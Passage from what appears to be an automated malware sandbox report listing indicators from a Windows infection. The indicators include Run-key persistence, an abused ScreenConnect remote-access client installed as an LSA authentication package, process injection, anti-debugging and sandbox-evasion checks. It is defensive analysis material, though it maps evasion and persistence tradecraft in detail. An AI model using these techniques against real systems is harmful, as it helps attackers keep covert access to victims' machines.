\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ff653c0cca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089293001\\ff653c0cca.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\80ceef0059.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089294001\\80ceef0059.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e189d890b8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089295001\\e189d890b8.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023d34-195.dat autoit_exe behavioral2/files/0x000a000000023dd9-1271.dat autoit_exe behavioral2/files/0x0008000000023ddd-1302.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390031006200370064003300370035003100330030006600320039003400610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\gbetfi2t.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\gbetfi2t.newcfg ScreenConnect.ClientService.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
pid Process 4524 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 1456 skotes.exe 4072 kdMujZh.exe 1460 bxvt.exe 3908 MAl7pjE.exe 3340 TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE 4872 d88b7e7413.exe 4504 8380fa5fb3.exe 5208 b95bc460f0.exe 5376 483d2fa8a0d53818306efeb32d3.exe 6000 skotes.exe 3460 e14cb127ab.exe 5672 MAl7pjE.exe 5288 64195aed60.exe 4636 a8e58ac38e.exe 5476 cda781c13c.exe 5236 cda781c13c.exe 5456 74caf6e3ae.exe 2232 bxvt.exe 708 skotes.exe 2220 ff653c0cca.exe 3476 80ceef0059.exe 5504 TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 2908 set thread context of 3528 2908 f3Ypd8O.exe 89 PID 4872 set thread context of 5800 4872 d88b7e7413.exe 148 PID 5728 set thread context of 5864 5728 7aencsM.exe 159 PID 5884 set thread context of 3792 5884 con12312211221.exe 167 PID 6104 set thread context of 5200 6104 monthdragon.exe 171 PID 5428 set thread context of 5492 5428 Bjkm5hE.exe 179 PID 5296 set thread context of 5752 5296 f3Ypd8O.exe 183 PID 1580 set thread context of 2220 1580 alex12112.exe 189 PID 3948 set thread context of 4780 3948 fher.exe 195 PID 4392 set thread context of 2984 4392 NL58452.exe 200 PID 5476 set thread context of 4000 5476 cda781c13c.exe 222 -
resource yara_rule behavioral2/memory/4640-772-0x00007FFD7E2C0000-0x00007FFD7E8A9000-memory.dmp upx behavioral2/memory/4640-795-0x00007FFD816D0000-0x00007FFD8178C000-memory.dmp upx behavioral2/memory/4640-794-0x00007FFD81790000-0x00007FFD817BE000-memory.dmp upx behavioral2/memory/4640-792-0x00007FFD817C0000-0x00007FFD817E4000-memory.dmp upx behavioral2/memory/4640-791-0x00007FFD87D30000-0x00007FFD87D42000-memory.dmp upx behavioral2/memory/4640-790-0x00007FFD817F0000-0x00007FFD81833000-memory.dmp upx behavioral2/memory/4640-789-0x00007FFD81840000-0x00007FFD8195C000-memory.dmp upx behavioral2/memory/4640-788-0x00007FFD81960000-0x00007FFD81986000-memory.dmp upx behavioral2/memory/4640-787-0x00007FFD9A7B0000-0x00007FFD9A7BB000-memory.dmp upx behavioral2/memory/4640-786-0x00007FFD87D50000-0x00007FFD87D64000-memory.dmp upx behavioral2/memory/4640-785-0x00007FFD81990000-0x00007FFD81A17000-memory.dmp upx behavioral2/memory/4640-784-0x00007FFD81A20000-0x00007FFD81AEF000-memory.dmp upx behavioral2/memory/4640-796-0x00007FFD816A0000-0x00007FFD816CB000-memory.dmp upx behavioral2/files/0x0007000000023e21-881.dat upx -
Drops file in Program Files directory 17 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe -
Drops file in Windows directory 18 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI1A2C.tmp msiexec.exe File created C:\Windows\Installer\e58149e.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI16FE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI170E.tmp msiexec.exe File created C:\Windows\Installer\wix{E7FFB52F-03E7-9BA2-D37A-094243CEF563}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File created C:\Windows\Installer\e58149c.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\skotes.job 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe File opened for modification C:\Windows\Tasks\bxvt.job kdMujZh.exe File opened for modification C:\Windows\Installer\e58149c.msi msiexec.exe File created C:\Windows\Installer\SourceHash{E7FFB52F-03E7-9BA2-D37A-094243CEF563} msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\bxvt.job kdMujZh.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023d86-584.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 11 IoCs
pid pid_target Process procid_target 708 2908 WerFault.exe 88 4924 5208 WerFault.exe 144 4836 5728 WerFault.exe 158 6036 5884 WerFault.exe 164 5368 6104 WerFault.exe 170 5516 5428 WerFault.exe 176 708 5296 WerFault.exe 182 5936 1580 WerFault.exe 186 5136 3948 WerFault.exe 193 5776 4392 WerFault.exe 199 4480 4636 WerFault.exe 214 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a18028f754.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1EoH8b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kdMujZh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sQ3DZPU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage e189d890b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d88b7e7413.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sQ3DZPU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 64195aed60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74caf6e3ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ff653c0cca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d9223dc79.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bxvt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e14cb127ab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language e189d890b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b95bc460f0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000622eb924184734490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000622eb9240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900622eb924000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d622eb924000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000622eb92400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString b95bc460f0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 b95bc460f0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4688 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 121 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 6040 taskkill.exe 2388 taskkill.exe 3316 taskkill.exe 5700 taskkill.exe 3636 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133845339974981343" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductName = "ScreenConnect Client (91b7d375130f294a)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36\Full msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Version = "402849799" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\ = "ScreenConnect Client (91b7d375130f294a) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\PackageCode = "F25BFF7E7E302AB93DA7902434EC5F36" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell msiexec.exe Set value (str) 